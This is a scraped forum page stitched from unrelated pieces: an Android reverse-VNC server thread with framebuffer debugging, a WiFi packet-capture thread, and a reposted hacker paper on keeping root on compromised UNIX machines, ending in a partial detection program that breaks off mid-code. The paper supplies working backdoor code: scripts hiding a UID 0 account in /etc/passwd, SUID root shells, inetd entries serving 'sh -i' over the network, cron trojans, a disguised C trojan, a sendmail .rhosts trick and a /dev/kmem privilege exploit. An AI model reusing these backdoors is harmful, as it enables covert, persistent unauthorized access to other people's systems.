Reverse VNC Server
A VNC server aimed at reverse connections (however it supports direct connections too).
Reverse connection means that the server connects to the client, i.e. the VNC viewer should be run in listen mode. This is useful when the device whose screen you are going to send to someone has no public IP address.
For it to work correctly, the device should be ROOTed.
Main requirements were:
- reverse connection stability (ability to reconnect at connection lost, none of free VNC servers can do this)
- support most devices (it uses the frame buffer as the screen capture method; input events are implemented by executing the input tool, so it should work everywhere)
Installation:
- install apk file from attachment. E.g.
adb install ReverseVNCServer.apk
Execution:
You can start VNC server via GUI or via command line.
Starting from command line:
Command line parameters (optional):
-c Reverse connection host and port
-t tries : Number of tries for reverse connection
-r : reconnect on reverse connections lost
-p localport : Local port for incoming connections. Default is 5901
-h : print this help
-v : view only
-s scale : scale percent (default is 100)
-d framebuffer device (default is /dev/graphics/fb0)
-z zoom : specify zoom of cursor coordinates in percents
E.g.
adb shell /data/data/org.arcsinx.reversevncserver/lib/libreversevncserver.so -c 192.168.1.34:5500 -r -p 5901
Hotkeys from VNC viewer:
- left => left
- right => right
- down => down
- up => up
- backspace => back
- ESC => back
- Home => Home
- PgUp => Menu
- F3 => Search
- F10 => Power
- F11 => Disconnect
- F12 => Shutdown application
Sources:
- Location
github.com/ArcsinX/ReverseVNCServer
- How to build
1) run ndk-build in top directory of checked out sources.
2) run update_libs.sh script
3) Import top of sources directory as android application project in Eclipse
4) Run from Eclipse to create apk file in bin directory
TODO:
- VNC password protection
- GUI improvements (needed to make it not so ugly)
Added GUI and apk file now available for download.
Great idea! Unfortunately it does not work on my Note 3:
Code:
Initializing framebuffer device /dev/graphics/fb0...
Screen info: xres=1080, yres=1920, xresv=1080, yresv=3840, xoffs=0, yoffs=0, bpp=32
mmap failed
dustbln said:
Great idea! Unfortunately it does not work on my Note 3:
Thanks for reply.
I have changed the frame buffer device initialization a bit and added more info output before the mmap() call.
Could you try to run it one more time and once more provide the output before the mmap failure?
Application updated:
- Added scaling
- Added view only mode
- Built-in NoVNC (for connections via browser)
- Some GUI improvements: landscape view, connection strings
Govorun said:
Thanks for reply.
I have changed the frame buffer device initialization a bit and added more info output before the mmap() call.
Could you try to run it one more time and once more provide the output before the mmap failure?
Thanks for your fast response! Unfortunately it still fails
Code:
Initializing framebuffer device /dev/graphics/fb0...
Screen info: xres=1080, yres=1920, xresv=1080, yresv=3840, xoffs=0, yoffs=0, bpp=32
line_length=4352, fb_size=16711680, align_size(fb_size)=16711680
mmap failed
Failed to initialize frame buffer
dustbln said:
Unfortunately it still fails
I reproduced this problem: I set fb_size to yours and tried mmap with it. It seems mmap fails for such big values (in case of high resolution).
So I replaced mmap call with malloc + read. Now it should work. Updated version attached in the first post.
Govorun said:
I reproduced this problem: I set fb_size to yours and tried mmap with it. It seems mmap fails for such big values (in case of high resolution).
So I replaced mmap call with malloc + read. Now it should work. Updated version attached in the first post.
We're getting closer :good:
Code:
User options set:
Reverse connection string: 192.168.1.X:XXXX
Reconnect on reverse connection lost
Local port: 5901
Initializing framebuffer device /dev/graphics/fb0 ...
Screen info:
xres=1080, yres=1920, xresv=1080, yresv=3840, xoffs=0, yoffs=0, bpp=32
line_length=4352, fb_size=16711680
Initializing server...
07/03/2014 15:06:46 Listening for VNC connections on TCP port 5901
07/03/2014 15:06:46 Listening for VNC connections on TCP6 port 5900
07/03/2014 15:06:46 Listening for HTTP connections on TCP port 5801
07/03/2014 15:06:46 URL http://localhost:5801
07/03/2014 15:06:46 Listening for HTTP connections on TCP6 port 5800
07/03/2014 15:06:46 URL http://localhost:5800
Initializing VNC server:
width: 1080
height: 1920
bpp: 32
port: 5901
scale: 100
07/03/2014 15:06:46 Making connection to client on host 192.168.1.X port XXXX
07/03/2014 15:06:46 other clients:
07/03/2014 15:06:46 Normal socket connection
Framebuffer read failed: No such device
Failed to update screen
dustbln said:
Code:
Initializing framebuffer device /dev/graphics/fb0 ...
...
Framebuffer read failed: No such device
It is very strange that the "No such device" error appears when trying to read the framebuffer device (not when opening it).
You can try the command
adb pull /dev/graphics/fb0
This command should create a local file fb0. If this command fails then something is wrong with the framebuffer device:
- maybe on the Note 3 framebuffer devices do not work
- maybe some other device should be used. You can list all your graphics devices with the command adb shell ls /dev/graphics/
On my device I have two framebuffer devices: fb0 (for the touchscreen) and fb1 (for HDMI connected displays)
If you are able to find a framebuffer device for which adb pull will not fail then you can try to start the VNC server with this device by passing the extra -d option.
E.g. adb shell /data/data/org.arcsinx.reversevncserver/lib/libreversevncserver.so -c 192.168.1.34:5500 -r -p 5901 -d /dev/graphics/fb1
Anyway I am going to implement one more screen capture mode (Surface Flinger). Maybe then it will work on your device too.
Govorun said:
It is very strange that the "No such device" error appears when trying to read the framebuffer device (not when opening it).
You can try the command
adb pull /dev/graphics/fb0
This command should create a local file fb0. If this command fails then something is wrong with the framebuffer device:
- maybe on the Note 3 framebuffer devices do not work
- maybe some other device should be used. You can list all your graphics devices with the command adb shell ls /dev/graphics/
On my device I have two framebuffer devices: fb0 (for the touchscreen) and fb1 (for HDMI connected displays)
If you are able to find a framebuffer device for which adb pull will not fail then you can try to start the VNC server with this device by passing the extra -d option.
E.g. adb shell /data/data/org.arcsinx.reversevncserver/lib/libreversevncserver.so -c 192.168.1.34:5500 -r -p 5901 -d /dev/graphics/fb1
Anyway I am going to implement one more screen capture mode (Surface Flinger). Maybe then it will work on your device too.
I doubt reading the framebuffer works on stock 4.4 Samsung Galaxy Note 3 ROM. Tried all of the devices and did some google research without any positive result.
Anyway. keep up the great work as a reliable RVNC Service was just missing on Android! :good:
Code:
# cat /proc/fb
0 mdssfb_90000
1 mdssfb_70000
2 mdssfb_a0000
# fbset -fb /dev/graphics/fb0
mode "1080x1920-0"
# D: 1.114 MHz, H: 0.865 kHz, V: 0.446 Hz
geometry 1080 1920 1080 3840 32
timings 898000 36 162 3 13 10 2
accel false
rgba 8/24,8/16,8/8,8/0
endmode
# cat /dev/graphics/fb0
cat: /dev/graphics/fb0: No such device
Hi!
I can't connect to my LG G2 with rooted Cloudy G3 2.1 - TightVNC said: Connection lost because server cancelled connection
If I try to connect via browser - Java blocks the app, and on JRE 8 the security level won't change lower than "high".
WebSocket won't work: WebSock error: [object Event]
How to connect?
If I use the app Odroid VNC SERVER - the connection is stable, but I see a distorted screen.
Hi !
It has an error.
unsigned int *ReadFb()
{
    if (UpdateFbInfo() == -1)
        return NULL;
#ifndef USEMMAP
    /* lseek(fd, offset, whence): rewind to the start of the device.
       The original call had offset and whence swapped (harmless only
       because SEEK_SET happens to be 0). */
    if (lseek(fbfd, 0, SEEK_SET) == -1)
    {
        perror("lseek failed for framebuffer device");
        return NULL;
    }
    /* read() may return fewer bytes than requested; loop until the whole
       frame is in, and treat any error (e.g. ENODEV) as a failed update. */
    size_t done = 0;
    while (done < fbsize)
    {
        ssize_t n = read(fbfd, (char *)fbmmap + done, fbsize - done);
        if (n == -1)
        {
            perror("Framebuffer read failed");
            return NULL;
        }
        if (n == 0)
            break; /* device hit EOF early: the frame is incomplete */
        done += n;
    }
#endif
    return (unsigned int *)fbmmap;
}
With the Samsung Galaxy Tab 3 it works well, but with the Samsung Galaxy Tab 2 and Nexus 10 it outputs perror("Framebuffer read failed") and sends a black buffer to the client.
can you help me fix it ?
Thank you
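The mmap-versus-read issue from this thread as an added example (not the project's own code): it computes the frame size the way the log above reports it (line_length times yres_virtual), reads a frame with malloc + read while handling short reads and the "No such device" (ENODEV) failure, and self-tests on a constructed temp-file "framebuffer". The names fb_frame_size, fb_read_frame, fb_read_advice and fb_selftest are chosen here and do not exist in libreversevncserver.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Bytes in one full frame as the server has to read it: line_length bytes
 * per row times yres_virtual rows. For the Note 3 log above that is
 * 4352 * 3840 = 16711680, twice the visible 1080x1920x4 because the panel
 * is double-buffered. Returns 0 for zero or overflowing inputs. */
size_t fb_frame_size(unsigned long line_length, unsigned long yres_virtual)
{
    if (line_length == 0 || yres_virtual == 0)
        return 0;
    if (line_length > SIZE_MAX / yres_virtual)
        return 0;
    return (size_t)line_length * (size_t)yres_virtual;
}

/* Rewind the device and read up to `want` bytes into `buf`, retrying
 * short reads. Returns the byte count (less than `want` if the device hit
 * EOF early) or -1 with errno set, e.g. ENODEV when the driver refuses
 * read() as it did on the Note 3. Note the lseek() argument order:
 * the ReadFb() posted above passed SEEK_SET as the offset. */
ssize_t fb_read_frame(int fd, void *buf, size_t want)
{
    if (lseek(fd, 0, SEEK_SET) == (off_t)-1)
        return -1;
    size_t done = 0;
    while (done < want) {
        ssize_t n = read(fd, (char *)buf + done, want - done);
        if (n < 0) {
            if (errno == EINTR)
                continue;           /* interrupted: just retry */
            return -1;
        }
        if (n == 0)
            break;                  /* early EOF: partial frame */
        done += (size_t)n;
    }
    return (ssize_t)done;
}

/* Turn a read failure into the advice the thread converged on. */
const char *fb_read_advice(int err)
{
    if (err == ENODEV)
        return "driver does not support read() on this fb node; try another "
               "/dev/graphics/fbN via -d or a non-framebuffer capture method";
    return strerror(err);
}

/* Self-check on a constructed "framebuffer": a temp file holding a 4x2
 * frame of 32 bpp pixels (line_length 16, yres_virtual 2). Returns 1 when
 * malloc + read reproduces the frame exactly and an oversized request
 * yields a short frame rather than an error, 0 otherwise, -1 on setup
 * failure. */
int fb_selftest(void)
{
    unsigned char frame[32];
    for (size_t i = 0; i < sizeof frame; i++)
        frame[i] = (unsigned char)i;

    FILE *f = tmpfile();
    if (!f)
        return -1;
    if (fwrite(frame, 1, sizeof frame, f) != sizeof frame || fflush(f) != 0) {
        fclose(f);
        return -1;
    }
    int fd = fileno(f);

    size_t want = fb_frame_size(16, 2);            /* 32 bytes */
    unsigned char *buf = malloc(want);             /* malloc + read, not mmap */
    int ok = buf != NULL;
    if (ok) {
        ssize_t got = fb_read_frame(fd, buf, want);
        ok = got == (ssize_t)want && memcmp(buf, frame, want) == 0;
    }
    unsigned char big[64];
    ok = ok && fb_read_frame(fd, big, sizeof big) == (ssize_t)sizeof frame;

    free(buf);
    fclose(f);
    return ok ? 1 : 0;
}

int main(void)
{
    printf("frame size for the Note 3 log: %zu bytes\n", fb_frame_size(4352, 3840));
    printf("self-test: %s\n", fb_selftest() == 1 ? "ok" : "FAILED");
    return 0;
}
```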
vanducnkt said:
perror("Framebuffer read failed");
Hi. Can you say what exact message appears? I mean that perror() call prints out error description.
Also can you provide output of the following command on your device?
Code:
ls /dev/graphics/
E.g. on the PC to which your device is connected
Code:
adb shell ls /dev/graphics/
P.S.
Btw, I have not updated the APK for some time (I am going to update the APK today.)
Update:
I have updated APK in the first post, try it first.
godlatro1 said:
Hi!
If I try to connect via browser - Java blocks the app, and on JRE 8 the security level won't change lower than "high".
Hi.
If your browser blocks the Java applet, you can use the JavaScript-only viewer by clicking the button "Click here to connect using noVNC" at the bottom of the browser page (circled in red on the attached picture, click to enlarge)
SurfaceFlinger implementation
Hi,
Is the version of this app with the SurfaceFlinger implementation released yet? I'm not able to use the framebuffer on my device.
Thanks,
Todd
Hi there, I know this is an old thread but I am just discovering it now. I tried to look up the github link but it doesn't appear that it's available anymore. Do you know if the source code is published anywhere right now? Thank you!
Related
Hi all,
I've been digging around to try and gain the ability to access the WiFi stack from an Android device that is rooted. What I am interested in, is capturing the 802.11 radio headers. I've done a bunch of searching, and it seems like getting the card in to promiscuous/monitor mode is out of the question. I haven't been able to find anyone to do it. But, even not being in this mode I am wondering if it is possible to get 802.11 headers.
I've downloaded the android-wifi-tether project to get the tools it has pre-built and installed on the file system, such as iwconfig, and I've also installed tcpdump.
I cannot get the card into monitor mode, as was expected:
Code:
# ./iwconfig tiwlan0 mode monitor
Error for wireless request "Set Mode" (8B06) :
SET failed on device tiwlan0 ; Operation not supported on transport endpoint.
That's fine. But when I use tcpdump, it seems as though the lowest layer of information available is the Ethernet/IP information:
Code:
# /data/tcpdump -i tiwlan0 -L
tcpdump: WARNING: can't create rx ring on packet socket 3: 92-Protocol not available
Data link types (use option -y to set):
DOCSIS (DOCSIS) (printing not supported)
EN10MB (Ethernet)
So for example, if I tcpdump:
Code:
07:51:21.793444 IP 192.168.1.103.34528 > 64.233.169.193.443: Flags [S], seq 3412091441, win 5840, options [mss 1460,sackOK,TS[|tcp]>
07:51:22.096239 IP 64.233.169.193.443 > 192.168.1.103.34528: Flags [S.], seq 513767123, ack 3412091442, win 5672, options [mss 1430,sackOK,TS[|tcp]>
Has anyone been able to dig any lower in the networking stack?
Thanks!
George
OK, I've done a significant amount of digging, and luckily the TI wl1271 wireless driver is built as a kernel module (I'm using a Droid 1). The "dmesg" output provides some hints that the TIWLAN module is active and parsing incoming packets at the lower layer:
Code:
<6>[ 5940.231292] TIWLAN: 3835.067243: rx , ERROR: rxData_receivePacketFromWlan() : MLME returned error
The code for this function can be found here, and even better the low-level packet information (e.g., RSSI) is available in this function:
Code:
/*
* Set rx attributes
*/
RxAttr.channel = pRxParams->channel;
RxAttr.packetInfo = pRxParams->flags;
RxAttr.ePacketType= pRxParams->packet_class_tag;
RxAttr.Rate = appRate;
RxAttr.Rssi = pRxParams->rx_level;
RxAttr.SNR = pRxParams->rx_snr;
RxAttr.status = pRxParams->status & RX_DESC_STATUS_MASK;
I'm also wondering whether or not it might be possible to drop the card in to promiscuous mode with some driver hacking. It appears to be possible through the RX filter, albeit maybe not supported by the actual firmware (that would suck):
Code:
#define RX_CFG_PROMISCUOUS 0x0008 /* promiscuous - receives all valid frames */
#define RX_CFG_BSSID 0x0020 /* receives frames from any BSSID */
#define RX_CFG_MAC 0x0010 /* receives frames destined to any MAC address */
#define RX_CFG_ENABLE_ONLY_MY_DEST_MAC 0x0010
I too want to capture WiFi packet headers on Android using tcpdump. I am using an HTC dream phone (Android 1.6, Wi-Fi (802.11b/g) using a Texas Instruments WL1251B chipset). The default TI driver filters the 802.11 packet headers while doing a packet capture on the device using tcpdump. Did you figure out a way to capture the 802.11 headers using the default TI driver?
Also, I was looking at installing a mac80211 based driver on an android device. I followed the instructions to create the kernel modules and loaded them up on the phone. But, I could not activate the WiFi interface after doing so (though I saw the "wlan0" interface indicating that the mac80211 driver was loaded).
So, I am stuck at this point. Can you provide some directions from here?
Thanks
Ashish
I thought this was an interesting paper written by an unknown author
You've been at it for all night. Trying all the exploits you can think of. The system seems tight. The system looks tight.
The system *is* tight. You've tried everything. Default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrect
permissions, race conditions, SUID exploits, Sendmail bugs, and so on... Nothing. After seeming endless you've managed to steal root. Now what? How do you hold onto this precious super-user
privilege you have worked so hard to achieve....?
This list is BY NO MEANS comprehensive. There are as many ways to leave backdoors into a UNIX computer as there are
ways into one.
Beforehand
Know the location of critical system files. This should be obvious (If you can't list any off the top of your head, stop reading
now, get a book on UNIX, read it, then come back to me...). Familiarity with passwd file formats (including general 7 field
format, system specific naming conventions, shadowing mechanisms, etc...). Know vi. Many systems will not have those
robust, user-friendly editors such as Pico and Emacs. Vi is also quite useful for needing to quickly search and edit a large file. If
you are connecting remotely (via dial-up/telnet/rlogin/whatever) it's always nice to have a robust terminal program that has a
nice, FAT scrollback buffer. This will come in handy if you want to cut and paste code, rc files, shell scripts, etc...
The permanence of these backdoors will depend completely on the technical savvy of the administrator. The experienced and
skilled administrator will be wise to many (if not all) of these backdoors. But, if you have managed to steal root, it is likely the
admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time
to come. One major thing to be aware of, is the fact that if you can cover your tracks during the initial break-in, no one will be
looking for back doors.
The JDevil Overt
[1] Add a UID 0 account to the passwd file. This is probably the most obvious and quickly discovered method of reentry. It
flies a red flag to the admin, saying "WE'RE UNDER ATTACK!!!". If you must do this, my advice is DO NOT simply
prepend or append it. Anyone casually examining the passwd file will see this. So, why not stick it in the middle...
#!/bin/csh
# Inserts a UID 0 account into the middle of the passwd file.
# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
# [email protected]
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
echo passwd file has $linecount[1] lines.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
echo Creating two files, $linecount[1] lines each \(or approximately that\).
split -$linecount[1] ./temppass # passwd string optional
echo "jdevil::0:0:jdevil:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
NEVER, EVER, change the root password. The reasons are obvious.
[2] In a similar vein, enable a disabled account as UID 0, such as Sync. Or, perhaps, an account somewhere buried deep in the
passwd file has been abandoned, and disabled by the sysadmin. Change her UID to 0 (and remove the '*' from the second
field).
[3] Leave an SUID root shell in /tmp.
#!/bin/sh
# Everyone's favorite...
cp /bin/csh /tmp/.JDEVIL # Don't name it that...
chmod 4755 /tmp/.JDEVIL
Many systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon a reboot. Many systems have /tmp mounted
to disallow SUID programs from executing. You can change all of these, but if the filesystem starts filling up, people may
notice...but, hey, this *is* the overt section....). I will not detail the changes necessary because they can be quite system
specific. Check out /var/spool/cron/crontabs/root and /etc/fstab.
The JDEVIL Veiled
[4] The super-server configuration file is not the first place a sysadmin will look, so why not put one there? First, some
background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the
appropriate program (usually a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical
lines look like this:
(1) (2) (3) (4) (5) (6) (7)
ftp stream tcp nowait root /usr/etc/ftpd ftpd
talk dgram udp wait root /usr/etc/ntalkd ntalkd
Field (1) is the daemon name that should appear in /etc/services. This tells inetd what to look for in /etc/services to determine
which port it should associate the program name with. (2) tells inetd which type of socket connection the daemon will expect.
TCP uses streams, and UDP uses datagrams. Field (3) is the protocol field which is either of the two transport protocols, TCP
or UDP. Field (4) specifies whether or not the daemon is iterative or concurrent. A 'wait' flag indicates that the server will
process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a
child process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or more
importantly, the UID) that the daemon is run as. (6) is the program to run when a connection arrives, and (7) is the actual
command (and optional arguments). If the program is trivial (usually requiring no user interaction) inetd may handle it internally.
This is done with an 'internal' flag in fields (6) and (7).
So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it
with something else. A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd
file, etc...
For the insinuation-impaired, try this:
Open the /etc/inetd.conf in an available editor. Find the line that reads:
daytime stream tcp nowait root internal
and change it to:
daytime stream tcp nowait /bin/sh sh -i.
You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill and
restart the process, (kill -9 , /usr/sbin/inetd or /usr/etc/inetd) which will interrupt ALL network connections (so it is a good idea
to do this off peak hours).
[5] An option to compromising a well known service would be to install a new one, that runs a program of your choice. One
simple solution is to set up a shell the runs similar to the above backdoor. You need to make sure the entry appears in
/etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple:
(1) (2)/(3) (4)
smtp 25/tcp mail
Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name
associated with the service. For instance, add this line to /etc/services:
jdevil 22/tcp jdevil
and this line to /etc/inetd.conf:
jdevil stream tcp nowait /bin/sh sh -i
Restart inetd as before.
Note: Potentially, these are VERY powerful backdoors. They not only offer local reentry from any account on the system,
they offer reentry from *any* account on *any* computer on the Internet.
[6] Cron-based trojan I. Cron is a wonderful system administration tool. It is also a wonderful tool for backdoors, since root's
crontab will, well, run as root... Again, depending on the level of experience of the sysadmin (and the implementation), this
backdoor may or may not last. /var/spool/cron/crontabs/root is where root's list for crontabs is usually located. Here, you have
several options. I will list a only few, as cron-based backdoors are only limited by your imagination. Cron is the clock daemon.
It is a tool for automatically executing commands at specified dates and times. Crontab is the command used to add, remove,
or view your crontab entries. It is just as easy to manually edit the /var/spool/crontab/root file as it is to use crontab. A crontab
entry has six fields:
(1) (2) (3) (4) (5) (6)
0 0 * * 1 /usr/bin/updatedb
Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31) month of the year (1-12), day of the week
(0-6). Field (6) is the command (or shell script) to execute. The above shell script is executed on Mondays. To exploit cron,
simply add an entry into /var/spool/crontab/root. For example: You can have a cronjob that will run daily and look in the
/etc/passwd file for the UID 0 account we previously added, and add him if he is missing, or do nothing otherwise (it may not
be a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate your
shady intentions). Add this line to /var/spool/crontab/root:
0 0 * * * /usr/bin/trojancode
This is the shell script:
#!/bin/csh
# Is our jdevil still on the system? Let's make sure he is.
#[email protected]
set JDEVILflag = (`grep jdevil /etc/passwd`)
if($#JDEVILflag == 0) then # Is he there?
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
split -$linecount[1] ./temppass # passwd string optional
echo "jdevil::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
else
endif
[7] Cron-based trojan II. This one was brought to my attention by our very own Mr. Zippy. For this, you need a copy of the
/etc/passwd file hidden somewhere. In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root
account with a passwd of your choosing. We run a cronjob that will, every morning at 2:30am (or every other morning), save a
copy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!).
Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everything
would be ok. Add this line to root's crontab file:
29 2 * * * /bin/usr/_passwd
make sure this exists:
#echo "root:1234567890123:0:0perator:/:/bin/csh" > /var/spool/mail/.passwd
and this is the simple shell script:
#!/bin/csh
# Install trojan /etc/passwd file for one minute
#[email protected]
cp /etc/passwd /etc/.temppass
cp /var/spool/mail/passwd /etc/passwd
sleep 60
mv /etc/.temppass /etc/passwd
[8] Compiled code trojan. Simple idea. Instead of a shell script, have some nice C code to obfuscate the effects. Here it is.
Make sure it runs as root. Name it something innocuous. Hide it well.
/* A little trojan to create an SUID root shell, if the proper argument is
given. C code, rather than shell to hide obvious it's effects. */
/* [email protected] */
#include
#define KEYWORD "industry3"
#define BUFFERSIZE 10
int main(argc, argv)
int argc;
char *argv[];{
int i=0;
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
/* This is the trojan part. */
system("cp /bin/csh /bin/.swp121");
system("chown root /bin/.swp121");
system("chmod 4755 /bin/.swp121");
}
}
/* Put your possibly system specific trojan
messages here */
/* Let's look like we're doing something... */
printf("Sychronizing bitmap image records.");
/* system("ls -alR / >& /dev/null > /dev/null&"); */
for(;i<10;i++){
fprintf(stderr,".");
sleep(1);
}
printf("\nDone.\n");
return(0);
} /* End main */
[9] The sendmail aliases file. The sendmail aliases file allows for mail sent to a particular username to either expand to several
users, or perhaps pipe the output to a program. Most well known of these is the uudecode alias trojan. Simply add the line:
"decode: "|/usr/bin/uudecode"
to the /etc/aliases file. Usually, you would then create a uuencoded .rhosts file with the full pathname embedded.
#! /bin/csh
# Create our .rhosts file. Note this will output to stdout.
echo "+ +" > tmpfile
/usr/bin/uuencode tmpfile /root/.rhosts
Next telnet to the desired site, port 25. Simply fakemail to decode and use as the subject body, the uuencoded version of the
.rhosts file. For a one liner (not faked, however) do this:
%echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail [email protected]
You can be as creative as you wish in this case. You can setup an alias that, when mailed to, will run a program of your
choosing. Many of the previous scripts and methods can be employed here.
The JDEVIL Covert
[10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such tripwire.
The idea is simple: insert trojan code in the source of a commonly used program. Some of most useful programs to us in this
case are su, login and passwd because they already run SUID root, and need no permission modification. Below are some
general examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX you
are backdooring. (Note: This may not always be possible, as some UNIX vendors are not so generous with their sourcecode.)
Since the code is very lengthy and different for many flavors, I will just include basic pseudo-code:
get input;
if input is special hardcoded flag, spawn evil trojan;
else if input is valid, continue;
else quit with error;
...
Not complex or difficult. Trojans of this nature can be done in less than 10 lines of additional code.
The JDEVIL Esoteric
[11] /dev/kmem exploit. It represents the virtual of the system. Since the kernel keeps its parameters in memory, it is possible
to modify the memory of the machine to change the UID of your processes. To do so requires that /dev/kmem have read/write
permission. The following steps are executed: Open the /dev/kmem device, seek to your page in memory, overwrite the UID of
your current process, then spawn a csh, which will inherit this UID. The following program does just that.
/* If /kmem is is readable and writable, this program will change the user's
UID and GID to 0. */
/* This code originally appeared in "UNIX security: A practical tutorial"
with some modifications by [email protected] */
#include
#include
#include
#include
#include
#include
#include
#define KEYWORD "nomenclature1"
struct user userpage;
long address(), userlocation;
int main(argc, argv, envp)
int argc;
char *argv[], *envp[];{
int count, fd;
long where, lseek();
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
fd=(open("/dev/kmem",O_RDWR);
if(fd<0){
printf("Cannot read or write to /dev/kmem\n");
perror(argv);
exit(10);
}
userlocation=address();
where=(lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(20);
}
count=read(fd,&userpage,sizeof(struct user));
if(count!=sizeof(struct user)){
printf("Cannot read user page\n");
perror(argv);
exit(30);
}
printf("Current UID: %d\n",userpage.u_ruid);
printf("Current GID: %d\n",userpage.g_ruid);
userpage.u_ruid=0;
userpage.u_rgid=0;
where=lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(40);
}
write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));
execle("/bin/csh","/bin/csh","-i",(char *)0, envp);
}
}
} /* End main */
#include
#include
#include
#define LNULL ((LDFILE *)0)
long address(){
LDFILE *object;
SYMENT symbol;
long idx=0;
object=ldopen("/unix",LNULL);
if(!object){
fprintf(stderr,"Cannot open /unix.\n");
exit(50);
}
for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){
if(!strcmp("_u",ldgetname(object,&symbol))){
fprintf(stdout,"User page is at 0x%8.8x\n",symbol.n_value);
ldclose(object);
return(symbol.n_value);
}
}
fprintf(stderr,"Cannot read symbol table in /unix.\n");
exit(60);
}
[12] Since the previous code requires /dev/kmem to be world accessible, and this is not likely a natural event, we need to take
care of this. My advice is to write a shell script similar to the one in [7] that will change the permissions on /dev/kmem for a
discrete amount of time (say 5 minutes) and then restore the original permissions. You can add this source to the source in [7]:
chmod 666 /dev/kmem
sleep 300 # Nap for 5 minutes
chmod 600 /dev/kmem # Or whatever it was before
JDevil
Happy Reading
There are some small spacing errors in the code but you get the idea
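Two checks an administrator would run against the passwd and inetd.conf doors the paper above describes, as an added example (not from the paper or the poster): one flags UID 0 entries that are not the real root account or have an empty password field, the other flags inetd services whose user, program or argument fields name a shell. The sample files are constructed, and the field layouts follow the paper's own descriptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Copy the next '\n'-terminated line of `text` into `line` and return a
 * pointer past it, or NULL when the text is exhausted. */
static const char *next_line(const char *text, char *line, size_t cap)
{
    if (text == NULL || *text == '\0')
        return NULL;
    const char *nl = strchr(text, '\n');
    size_t len = nl ? (size_t)(nl - text) : strlen(text);
    if (len >= cap)
        len = cap - 1;
    memcpy(line, text, len);
    line[len] = '\0';
    return nl ? nl + 1 : text + strlen(text);
}

/* Count passwd entries that hand out UID 0 to anything but the real root
 * account: a UID 0 line under another name (an inserted account or a
 * re-enabled system account), or a UID 0 line with an empty password. */
int count_rogue_uid0(const char *passwd)
{
    char line[512];
    int hits = 0;
    for (const char *p = passwd; (p = next_line(p, line, sizeof line)) != NULL; ) {
        char *f[7];
        int n = 0;
        char *s = line;
        /* split on ':' but keep empty fields, which strtok() would drop */
        while (n < 7 && s != NULL) {
            f[n++] = s;
            s = strchr(s, ':');
            if (s)
                *s++ = '\0';
        }
        if (n < 4 || line[0] == '#')
            continue;                       /* blank, comment or junk */
        if (strcmp(f[2], "0") != 0)
            continue;                       /* not UID 0 */
        if (strcmp(f[0], "root") != 0 || f[1][0] == '\0')
            hits++;
    }
    return hits;
}

/* True if a path or command name is an interactive shell. */
static int is_shell(const char *tok)
{
    const char *base = strrchr(tok, '/');
    base = base ? base + 1 : tok;
    return strcmp(base, "sh") == 0 || strcmp(base, "csh") == 0 ||
           strcmp(base, "bash") == 0 || strcmp(base, "ksh") == 0;
}

/* Count inetd.conf services whose user, server-program or argument
 * fields (5)-(7) name a shell. Comment lines are skipped. */
int count_inetd_shell_services(const char *conf)
{
    char line[512];
    int hits = 0;
    for (const char *p = conf; (p = next_line(p, line, sizeof line)) != NULL; ) {
        char *tok = strtok(line, " \t");
        if (tok == NULL || tok[0] == '#')
            continue;
        int idx = 0, hit = 0;
        for (; tok != NULL; tok = strtok(NULL, " \t"), idx++)
            if (idx >= 4 && is_shell(tok))
                hit = 1;
        hits += hit;
    }
    return hits;
}

/* Constructed sample files, not taken from any real system. */
const char *SAMPLE_PASSWD =
    "root:x:0:0:root:/root:/bin/sh\n"
    "daemon:x:1:1:daemon:/usr/sbin:/bin/false\n"
    "jdevil::0:0:jdevil:/home/sweet/home:/bin/csh\n"
    "sync:x:0:1:sync:/bin:/bin/sync\n"
    "alice:x:1000:1000:Alice:/home/alice:/bin/bash\n";

const char *SAMPLE_INETD =
    "# /etc/inetd.conf sample\n"
    "ftp stream tcp nowait root /usr/etc/ftpd ftpd\n"
    "daytime stream tcp nowait /bin/sh sh -i\n"
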